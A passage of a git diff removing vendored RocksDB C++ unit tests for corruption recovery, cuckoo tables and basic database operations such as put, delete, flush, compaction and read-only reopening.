-    for (const auto& m : metadata) {
-      if (m.level == level) {
-        CorruptFile(dbname_ + "/" + m.name, offset, bytes_to_corrupt);
-        return;
-      }
-    }
-    FAIL() << "no file found at level";
-  }
-
-
-  int Property(const std::string& name) {
-    std::string property;
-    int result;
-    if (db_->GetProperty(name, &property) &&
-        sscanf(property.c_str(), "%d", &result) == 1) {
-      return result;
-    } else {
-      return -1;
-    }
-  }
-
-  // Return the ith key
-  Slice Key(int i, std::string* storage) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%016d", i);
-    storage->assign(buf, strlen(buf));
-    return Slice(*storage);
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) {
-    if (k == 0) {
-      // Ugh.  Random seed of 0 used to produce no entropy.  This code
-      // preserves the implementation that was in place when all of the
-      // magic values in this file were picked.
-      *storage = std::string(kValueSize, ' ');
-      return Slice(*storage);
-    } else {
-      Random r(k);
-      return test::RandomString(&r, kValueSize, storage);
-    }
-  }
-};
-
-TEST_F(CorruptionTest, Recovery) {
-  Build(100);
-  Check(100, 100);
-#ifdef OS_WIN
-  // On Wndows OS Disk cache does not behave properly
-  // We do not call FlushBuffers on every Flush. If we do not close
-  // the log file prior to the corruption we end up with the first
-  // block not corrupted but only the second. However, under the debugger
-  // things work just fine but never pass when running normally
-  // For that reason people may want to run with unbuffered I/O. That option
-  // is not available for WAL though.
-  CloseDb();
-#endif
-  Corrupt(kLogFile, 19, 1);      // WriteBatch tag for first record
-  Corrupt(kLogFile, log::kBlockSize + 1000, 1);  // Somewhere in second block
-  ASSERT_TRUE(!TryReopen().ok());
-  options_.paranoid_checks = false;
-  Reopen(&options_);
-
-  // The 64 records in the first two log blocks are completely lost.
-  Check(36, 36);
-}
-
-TEST_F(CorruptionTest, RecoverWriteError) {
-  env_.writable_file_error_ = true;
-  Status s = TryReopen();
-  ASSERT_TRUE(!s.ok());
-}
-
-TEST_F(CorruptionTest, NewFileErrorDuringWrite) {
-  // Do enough writing to force minor compaction
-  env_.writable_file_error_ = true;
-  const int num =
-      static_cast<int>(3 + (Options().write_buffer_size / kValueSize));
-  std::string value_storage;
-  Status s;
-  bool failed = false;
-  for (int i = 0; i < num; i++) {
-    WriteBatch batch;
-    batch.Put("a", Value(100, &value_storage));
-    s = db_->Write(WriteOptions(), &batch);
-    if (!s.ok()) {
-      failed = true;
-    }
-    ASSERT_TRUE(!failed || !s.ok());
-  }
-  ASSERT_TRUE(!s.ok());
-  ASSERT_GE(env_.num_writable_file_errors_, 1);
-  env_.writable_file_error_ = false;
-  Reopen();
-}
-
-TEST_F(CorruptionTest, TableFile) {
-  Build(100);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-  dbi->TEST_CompactRange(1, nullptr, nullptr);
-
-  Corrupt(kTableFile, 100, 1);
-  Check(99, 99);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, TableFileIndexData) {
-  Options options;
-  // very big, we'll trigger flushes manually
-  options.write_buffer_size = 100 * 1024 * 1024;
-  Reopen(&options);
-  // build 2 tables, flush at 5000
-  Build(10000, 5000);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-
-  // corrupt an index block of an entire file
-  Corrupt(kTableFile, -2000, 500);
-  Reopen();
-  dbi = reinterpret_cast<DBImpl*>(db_);
-  // one full file should be readable, since only one was corrupted
-  // the other file should be fully non-readable, since index was corrupted
-  Check(5000, 5000);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, MissingDescriptor) {
-  Build(1000);
-  RepairDB();
-  Reopen();
-  Check(1000, 1000);
-}
-
-TEST_F(CorruptionTest, SequenceNumberRecovery) {
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v1"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v2"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v3"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v4"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v5"));
-  RepairDB();
-  Reopen();
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v5", v);
-  // Write something.  If sequence number was not recovered properly,
-  // it will be hidden by an earlier write.
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v6"));
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v6", v);
-  Reopen();
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v6", v);
-}
-
-TEST_F(CorruptionTest, CorruptedDescriptor) {
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "hello"));
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-
-  Corrupt(kDescriptorFile, 0, 1000);
-  Status s = TryReopen();
-  ASSERT_TRUE(!s.ok());
-
-  RepairDB();
-  Reopen();
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("hello", v);
-}
-
-TEST_F(CorruptionTest, CompactionInputError) {
-  Options options;
-  Reopen(&options);
-  Build(10);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-  dbi->TEST_CompactRange(1, nullptr, nullptr);
-  ASSERT_EQ(1, Property("rocksdb.num-files-at-level2"));
-
-  Corrupt(kTableFile, 100, 1);
-  Check(9, 9);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  // Force compactions by writing lots of values
-  Build(10000);
-  Check(10000, 10000);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, CompactionInputErrorParanoid) {
-  Options options;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 131072;
-  options.max_write_buffer_number = 2;
-  Reopen(&options);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-
-  // Fill levels >= 1
-  for (int level = 1; level < dbi->NumberLevels(); level++) {
-    dbi->Put(WriteOptions(), "", "begin");
-    dbi->Put(WriteOptions(), "~", "end");
-    dbi->TEST_FlushMemTable();
-    for (int comp_level = 0; comp_level < dbi->NumberLevels() - level;
-         ++comp_level) {
-      dbi->TEST_CompactRange(comp_level, nullptr, nullptr);
-    }
-  }
-
-  Reopen(&options);
-
-  dbi = reinterpret_cast<DBImpl*>(db_);
-  Build(10);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_WaitForCompact();
-  ASSERT_EQ(1, Property("rocksdb.num-files-at-level0"));
-
-  CorruptTableFileAtLevel(0, 100, 1);
-  Check(9, 9);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  // Write must eventually fail because of corrupted table
-  Status s;
-  std::string tmp1, tmp2;
-  bool failed = false;
-  for (int i = 0; i < 10000; i++) {
-    s = db_->Put(WriteOptions(), Key(i, &tmp1), Value(i, &tmp2));
-    if (!s.ok()) {
-      failed = true;
-    }
-    // if one write failed, every subsequent write must fail, too
-    ASSERT_TRUE(!failed || !s.ok()) << "write did not fail in a corrupted db";
-  }
-  ASSERT_TRUE(!s.ok()) << "write did not fail in corrupted paranoid db";
-}
-
-TEST_F(CorruptionTest, UnrelatedKeys) {
-  Build(10);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  Corrupt(kTableFile, 100, 1);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  std::string tmp1, tmp2;
-  ASSERT_OK(db_->Put(WriteOptions(), Key(1000, &tmp1), Value(1000, &tmp2)));
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), Key(1000, &tmp1), &v));
-  ASSERT_EQ(Value(1000, &tmp2).ToString(), v);
-  dbi->TEST_FlushMemTable();
-  ASSERT_OK(db_->Get(ReadOptions(), Key(1000, &tmp1), &v));
-  ASSERT_EQ(Value(1000, &tmp2).ToString(), v);
-}
-
-TEST_F(CorruptionTest, FileSystemStateCorrupted) {
-  for (int iter = 0; iter < 2; ++iter) {
-    Options options;
-    options.paranoid_checks = true;
-    options.create_if_missing = true;
-    Reopen(&options);
-    Build(10);
-    ASSERT_OK(db_->Flush(FlushOptions()));
-    DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-    std::vector<LiveFileMetaData> metadata;
-    dbi->GetLiveFilesMetaData(&metadata);
-    ASSERT_GT(metadata.size(), size_t(0));
-    std::string filename = dbname_ + metadata[0].name;
-
-    delete db_;
-    db_ = nullptr;
-
-    if (iter == 0) {  // corrupt file size
-      unique_ptr<WritableFile> file;
-      env_.NewWritableFile(filename, &file, EnvOptions());
-      file->Append(Slice("corrupted sst"));
-      file.reset();
-    } else {  // delete the file
-      env_.DeleteFile(filename);
-    }
-
-    Status x = TryReopen(&options);
-    ASSERT_TRUE(x.IsCorruption());
-    DestroyDB(dbname_, options_);
-    Reopen(&options);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RepairDB() is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/cuckoo_table_db_test.cc b/thirdparty/rocksdb/db/cuckoo_table_db_test.cc
deleted file mode 100644
index e7c2d27..0000000
--- a/thirdparty/rocksdb/db/cuckoo_table_db_test.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/cuckoo_table_reader.h"
-#include "table/meta_blocks.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CuckooTableDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
- public:
-  CuckooTableDBTest() : env_(Env::Default()) {
-    dbname_ = test::TmpDir() + "/cuckoo_table_db_test";
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-    db_ = nullptr;
-    Reopen();
-  }
-
-  ~CuckooTableDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-  }
-
-  Options CurrentOptions() {
-    Options options;
-    options.table_factory.reset(NewCuckooTableFactory());
-    options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true));
-    options.allow_mmap_reads = true;
-    options.create_if_missing = true;
-    options.allow_concurrent_memtable_write = false;
-    return options;
-  }
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  // The following util methods are copied from plain_table_db_test.
-  void Reopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opts;
-    if (options != nullptr) {
-      opts = *options;
-    } else {
-      opts = CurrentOptions();
-      opts.create_if_missing = true;
-    }
-    ASSERT_OK(DB::Open(opts, dbname_, &db_));
-  }
-
-  Status Put(const Slice& k, const Slice& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  std::string Get(const std::string& k) {
-    ReadOptions options;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  int NumTableFilesAtLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel() {
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < db_->NumberLevels(); level++) {
-      int f = NumTableFilesAtLevel(level);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-};
-
-TEST_F(CuckooTableDBTest, Flush) {
-  // Try with empty DB first.
-  ASSERT_TRUE(dbfull() != nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("key2"));
-
-  // Add some values to db.
-  Options options = CurrentOptions();
-  Reopen(&options);
-
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key3", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  TablePropertiesCollection ptc;
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(1U, ptc.size());
-  ASSERT_EQ(3U, ptc.begin()->second->num_entries);
-  ASSERT_EQ("1", FilesPerLevel());
-
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("NOT_FOUND", Get("key4"));
-
-  // Now add more keys and flush.
-  ASSERT_OK(Put("key4", "v4"));
-  ASSERT_OK(Put("key5", "v5"));
-  ASSERT_OK(Put("key6", "v6"));
-  dbfull()->TEST_FlushMemTable();
-
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(2U, ptc.size());
-  auto row = ptc.begin();
-  ASSERT_EQ(3U, row->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("v4", Get("key4"));
-  ASSERT_EQ("v5", Get("key5"));
-  ASSERT_EQ("v6", Get("key6"));
-
-  ASSERT_OK(Delete("key6"));
-  ASSERT_OK(Delete("key5"));
-  ASSERT_OK(Delete("key4"));
-  dbfull()->TEST_FlushMemTable();
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(3U, ptc.size());
-  row = ptc.begin();
-  ASSERT_EQ(3U, row->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("NOT_FOUND", Get("key4"));
-  ASSERT_EQ("NOT_FOUND", Get("key5"));
-  ASSERT_EQ("NOT_FOUND", Get("key6"));
-}
-
-TEST_F(CuckooTableDBTest, FlushWithDuplicateKeys) {
-  Options options = CurrentOptions();
-  Reopen(&options);
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key1", "v3"));  // Duplicate
-  dbfull()->TEST_FlushMemTable();
-
-  TablePropertiesCollection ptc;
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(1U, ptc.size());
-  ASSERT_EQ(2U, ptc.begin()->second->num_entries);
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_EQ("v3", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-}
-
-namespace {
-static std::string Key(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "key_______%06d", i);
-  return std::string(buf);
-}
-static std::string Uint64Key(uint64_t i) {
-  std::string str;
-  str.resize(8);
-  memcpy(&str[0], static_cast<void*>(&i), 8);
-  return str;
-}
-}  // namespace.
-
-TEST_F(CuckooTableDBTest, Uint64Comparator) {
-  Options options = CurrentOptions();
-  options.comparator = test::Uint64Comparator();
-  Reopen(&options);
-
-  ASSERT_OK(Put(Uint64Key(1), "v1"));
-  ASSERT_OK(Put(Uint64Key(2), "v2"));
-  ASSERT_OK(Put(Uint64Key(3), "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v1", Get(Uint64Key(1)));
-  ASSERT_EQ("v2", Get(Uint64Key(2)));
-  ASSERT_EQ("v3", Get(Uint64Key(3)));
-  ASSERT_EQ("NOT_FOUND", Get(Uint64Key(4)));
-
-  // Add more keys.
-  ASSERT_OK(Delete(Uint64Key(2)));  // Delete.
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_OK(Put(Uint64Key(3), "v0"));  // Update.
-  ASSERT_OK(Put(Uint64Key(4), "v4"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v1", Get(Uint64Key(1)));
-  ASSERT_EQ("NOT_FOUND", Get(Uint64Key(2)));
-  ASSERT_EQ("v0", Get(Uint64Key(3)));
-  ASSERT_EQ("v4", Get(Uint64Key(4)));
-}
-
-TEST_F(CuckooTableDBTest, CompactionIntoMultipleFiles) {
-  // Create a big L0 file and check it compacts into multiple files in L1.
-  Options options = CurrentOptions();
-  options.write_buffer_size = 270 << 10;
-  // Two SST files should be created, each containing 14 keys.
-  // Number of buckets will be 16. Total size ~156 KB.
-  options.target_file_size_base = 160 << 10;
-  Reopen(&options);
-
-  // Write 28 values, each 10016 B ~ 10KB
-  for (int idx = 0; idx < 28; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a' + idx)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("1", FilesPerLevel());
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow trivial move */);
-  ASSERT_EQ("0,2", FilesPerLevel());
-  for (int idx = 0; idx < 28; ++idx) {
-    ASSERT_EQ(std::string(10000, 'a' + idx), Get(Key(idx)));
-  }
-}
-
-TEST_F(CuckooTableDBTest, SameKeyInsertedInTwoDifferentFilesAndCompacted) {
-  // Insert same key twice so that they go to different SST files. Then wait for
-  // compaction and check if the latest value is stored and old value removed.
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 2;
-  Reopen(&options);
-
-  // Write 11 values, each 10016 B
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a')));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("1", FilesPerLevel());
-
-  // Generate one more file in level-0, and should trigger level-0 compaction
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a' + idx)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-
-  ASSERT_EQ("0,1", FilesPerLevel());
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_EQ(std::string(10000, 'a' + idx), Get(Key(idx)));
-  }
-}
-
-TEST_F(CuckooTableDBTest, AdaptiveTable) {
-  Options options = CurrentOptions();
-
-  // Write some keys using cuckoo table.
-  options.table_factory.reset(NewCuckooTableFactory());
-  Reopen(&options);
-
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key3", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  // Write some keys using plain table.
-  options.create_if_missing = false;
-  options.table_factory.reset(NewPlainTableFactory());
-  Reopen(&options);
-  ASSERT_OK(Put("key4", "v4"));
-  ASSERT_OK(Put("key1", "v5"));
-  dbfull()->TEST_FlushMemTable();
-
-  // Write some keys using block based table.
-  std::shared_ptr<TableFactory> block_based_factory(
-      NewBlockBasedTableFactory());
-  options.table_factory.reset(NewAdaptiveTableFactory(block_based_factory));
-  Reopen(&options);
-  ASSERT_OK(Put("key5", "v6"));
-  ASSERT_OK(Put("key2", "v7"));
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v5", Get("key1"));
-  ASSERT_EQ("v7", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("v4", Get("key4"));
-  ASSERT_EQ("v6", Get("key5"));
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  if (rocksdb::port::kLittleEndian) {
-    ::testing::InitGoogleTest(&argc, argv);
-    return RUN_ALL_TESTS();
-  }
-  else {
-    fprintf(stderr, "SKIPPED as Cuckoo table doesn't support Big Endian\n");
-    return 0;
-  }
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_basic_test.cc b/thirdparty/rocksdb/db/db_basic_test.cc
deleted file mode 100644
index 654a457..0000000
--- a/thirdparty/rocksdb/db/db_basic_test.cc
+++ /dev/null
@@ -1,856 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-#endif
-
-namespace rocksdb {
-
-class DBBasicTest : public DBTestBase {
- public:
-  DBBasicTest() : DBTestBase("/db_basic_test") {}
-};
-
-TEST_F(DBBasicTest, OpenWhenOpen) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  rocksdb::DB* db2 = nullptr;
-  rocksdb::Status s = DB::Open(options, dbname_, &db2);
-
-  ASSERT_EQ(Status::Code::kIOError, s.code());
-  ASSERT_EQ(Status::SubCode::kNone, s.subcode());
-  ASSERT_TRUE(strstr(s.getState(), "lock ") != nullptr);
-
-  delete db2;
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, ReadOnlyDB) {
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put("bar", "v2"));
-  ASSERT_OK(Put("foo", "v3"));
-  Close();
-
-  auto options = CurrentOptions();
-  assert(options.env = env_);
-  ASSERT_OK(ReadOnlyReopen(options));
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v2", Get("bar"));
-  Iterator* iter = db_->NewIterator(ReadOptions());
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    ++count;
-  }
-  ASSERT_EQ(count, 2);
-  delete iter;
-  Close();
-
-  // Reopen and flush memtable.
-  Reopen(options);
-  Flush();
-  Close();
-  // Now check keys in read only mode.
-  ASSERT_OK(ReadOnlyReopen(options));
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v2", Get("bar"));
-  ASSERT_TRUE(db_->SyncWAL().IsNotSupported());
-}
-
-TEST_F(DBBasicTest, CompactedDB) {
-  const uint64_t kFileSize = 1 << 20;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = kFileSize;
-  options.target_file_size_base = kFileSize;
-  options.max_bytes_for_level_base = 1 << 30;
-  options.compression = kNoCompression;
-  Reopen(options);
-  // 1 L0 file, use CompactedDB if max_open_files = -1
-  ASSERT_OK(Put("aaa", DummyString(kFileSize / 2, '1')));
-  Flush();
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  Status s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-  ASSERT_EQ(DummyString(kFileSize / 2, '1'), Get("aaa"));
-  Close();
-  options.max_open_files = -1;
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported in compacted db mode.");
-  ASSERT_EQ(DummyString(kFileSize / 2, '1'), Get("aaa"));
-  Close();
-  Reopen(options);
-  // Add more L0 files
-  ASSERT_OK(Put("bbb", DummyString(kFileSize / 2, '2')));
-  Flush();
-  ASSERT_OK(Put("aaa", DummyString(kFileSize / 2, 'a')));
-  Flush();
-  ASSERT_OK(Put("bbb", DummyString(kFileSize / 2, 'b')));
-  ASSERT_OK(Put("eee", DummyString(kFileSize / 2, 'e')));
-  Flush();
-  Close();
-
-  ASSERT_OK(ReadOnlyReopen(options));
-  // Fallback to read-only DB
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-  Close();
-
-  // Full compaction
-  Reopen(options);
-  // Add more keys
-  ASSERT_OK(Put("fff", DummyString(kFileSize / 2, 'f')));
-  ASSERT_OK(Put("hhh", DummyString(kFileSize / 2, 'h')));
-  ASSERT_OK(Put("iii", DummyString(kFileSize / 2, 'i')));
-  ASSERT_OK(Put("jjj", DummyString(kFileSize / 2, 'j')));
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(3, NumTableFilesAtLevel(1));
-  Close();
-
-  // CompactedDB
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported in compacted db mode.");
-  ASSERT_EQ("NOT_FOUND", Get("abc"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'a'), Get("aaa"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'b'), Get("bbb"));
-  ASSERT_EQ("NOT_FOUND", Get("ccc"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'e'), Get("eee"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'f'), Get("fff"));
-  ASSERT_EQ("NOT_FOUND", Get("ggg"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'h'), Get("hhh"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'i'), Get("iii"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'j'), Get("jjj"));
-  ASSERT_EQ("NOT_FOUND", Get("kkk"));
-
-  // MultiGet
-  std::vector<std::string> values;
-  std::vector<Status> status_list = dbfull()->MultiGet(
-      ReadOptions(),
-      std::vector<Slice>({Slice("aaa"), Slice("ccc"), Slice("eee"),
-                          Slice("ggg"), Slice("iii"), Slice("kkk")}),
-      &values);
-  ASSERT_EQ(status_list.size(), static_cast<uint64_t>(6));
-  ASSERT_EQ(values.size(), static_cast<uint64_t>(6));
-  ASSERT_OK(status_list[0]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'a'), values[0]);
-  ASSERT_TRUE(status_list[1].IsNotFound());
-  ASSERT_OK(status_list[2]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'e'), values[2]);
-  ASSERT_TRUE(status_list[3].IsNotFound());
-  ASSERT_OK(status_list[4]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'i'), values[4]);
-  ASSERT_TRUE(status_list[5].IsNotFound());
-
-  Reopen(options);
-  // Add a key
-  ASSERT_OK(Put("fff", DummyString(kFileSize / 2, 'f')));
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-}
-
-TEST_F(DBBasicTest, LevelLimitReopen) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const std::string value(1024 * 1024, ' ');
-  int i = 0;
-  while (NumTableFilesAtLevel(2, 1) == 0) {
-    ASSERT_OK(Put(1, Key(i++), value));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  options.num_levels = 1;
-  options.max_bytes_for_level_multiplier_additional.resize(1, 1);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ(s.IsInvalidArgument(), true);
-  ASSERT_EQ(s.ToString(),
-            "Invalid argument: db has more levels than options.num_levels");
-
-  options.num_levels = 10;
-  options.max_bytes_for_level_multiplier_additional.resize(10, 1);
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, PutDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_OK(Delete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBBasicTest, PutSingleDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo2", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo2"));
-    ASSERT_OK(SingleDelete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
